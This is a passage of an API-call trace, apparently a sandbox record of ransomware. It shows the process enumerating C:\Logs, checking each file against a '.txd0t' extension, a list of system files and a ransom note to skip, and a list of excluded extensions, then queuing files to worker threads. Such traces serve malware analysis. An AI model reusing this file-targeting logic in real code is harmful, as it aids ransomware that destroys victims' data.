cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.072] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0089.072] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned=".evtx" [0089.072] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="bootsect.bak") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="iconcache.db") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="thumbs.db") returned -1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=" ransomware ") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=" ransom ") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="debug.txt") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="boot.ini") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="desktop.ini") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="autorun.inf") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntuser.dat") returned -1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntldr") returned -1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntdetect.com") returned -1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="bootfont.bin") returned 1 [0089.072] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.072] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned=".evtx" [0089.072] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.073] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.082] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.082] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0089.082] SetEvent (hEvent=0x3fc) returned 1 [0089.082] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0089.082] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=".") returned 1 [0089.082] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="..") returned 1 [0089.082] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.082] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.082] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0089.082] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned=".evtx" [0089.083] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.083] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.083] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.083] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=" ransom ") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="debug.txt") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="boot.ini") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntldr") returned -1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.084] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.084] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned=".evtx" [0089.084] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.084] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.084] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.085] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0089.085] SetEvent (hEvent=0x408) returned 1 [0089.085] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0089.085] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=".") returned 1 [0089.085] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="..") returned 1 [0089.085] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.085] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.085] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Known Folders API Service.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" [0089.085] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx") returned=".evtx" [0089.085] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="bootsect.bak") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="iconcache.db") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="thumbs.db") returned -1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=" ransomware ") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=" ransom ") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="debug.txt") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="boot.ini") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="desktop.ini") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="autorun.inf") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntuser.dat") returned -1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntldr") returned -1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntdetect.com") returned -1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="bootfont.bin") returned 1 [0089.085] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.085] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx") returned=".evtx" [0089.085] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.085] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.097] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.099] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" [0089.099] SetEvent (hEvent=0x418) returned 1 [0089.099] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0089.099] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=".") returned 1 [0089.099] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="..") returned 1 [0089.099] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.099] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.100] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-LiveId%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" [0089.100] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx") returned=".evtx" [0089.100] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=" ransom ") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="debug.txt") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="boot.ini") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntldr") returned -1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.100] StrCmpIW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.100] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx") returned=".evtx" [0089.100] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.100] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.110] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.110] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" [0089.110] SetEvent (hEvent=0x408) returned 1 [0089.110] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0089.110] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=".") returned 1 [0089.110] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="..") returned 1 [0089.110] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.110] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.110] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" [0089.110] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx") returned=".evtx" [0089.110] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.110] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="bootsect.bak") returned 1 [0089.110] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="iconcache.db") returned 1 [0089.110] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="thumbs.db") returned -1 [0089.110] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=" ransomware ") returned 1 [0089.110] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2=" ransom ") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="debug.txt") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="boot.ini") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="desktop.ini") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="autorun.inf") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntuser.dat") returned -1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntldr") returned -1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="ntdetect.com") returned -1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="bootfont.bin") returned 1 [0089.111] StrCmpIW (psz1="Microsoft-Windows-MUI%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.111] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx") returned=".evtx" [0089.111] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.111] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.117] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.117] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" [0089.117] SetEvent (hEvent=0x410) returned 1 [0089.117] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0089.117] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=".") returned 1 [0089.117] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="..") returned 1 [0089.117] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.117] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.117] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" [0089.117] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx") returned=".evtx" [0089.117] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2=" ransom ") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="debug.txt") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="boot.ini") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.117] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.118] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.118] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntldr") returned -1 [0089.118] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.118] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.118] StrCmpIW (psz1="Microsoft-Windows-MUI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.118] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx") returned=".evtx" [0089.118] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.118] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.120] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.120] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" [0089.120] SetEvent (hEvent=0x408) returned 1 [0089.120] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0089.120] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=".") returned 1 [0089.120] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="..") returned 1 [0089.120] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.120] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.120] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NCSI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" [0089.120] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx") returned=".evtx" [0089.120] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2=" ransom ") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="debug.txt") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="boot.ini") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntldr") returned -1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.120] StrCmpIW (psz1="Microsoft-Windows-NCSI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.120] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx") returned=".evtx" [0089.121] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.121] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.131] StrCpyW (in: 